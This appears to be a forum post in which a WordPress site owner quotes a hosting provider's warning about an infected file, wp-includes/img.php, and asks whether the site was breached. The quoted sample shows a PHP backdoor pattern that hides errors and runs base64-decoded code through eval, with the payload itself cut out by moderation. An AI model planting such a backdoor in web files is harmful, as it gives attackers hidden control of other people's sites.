I received the following from my hosting service.
Does this indicate that somehow a bad guy breached WordPress security?
Of course I am automatically updating my site and using the latest WP.
Hello xxx, Please note that on a further check of your account we noticed the following exploited scripts: /home/xxx/public_html/wp/wp-includes/img.php The above scripts are now disabled to avoid any other issues. Please see an example of exploited content: ================ <?php /*45637*/ @error_reporting(0); @eval(base64_decode("aWYg [code moderated] =")); /*45637*/ ?> ==================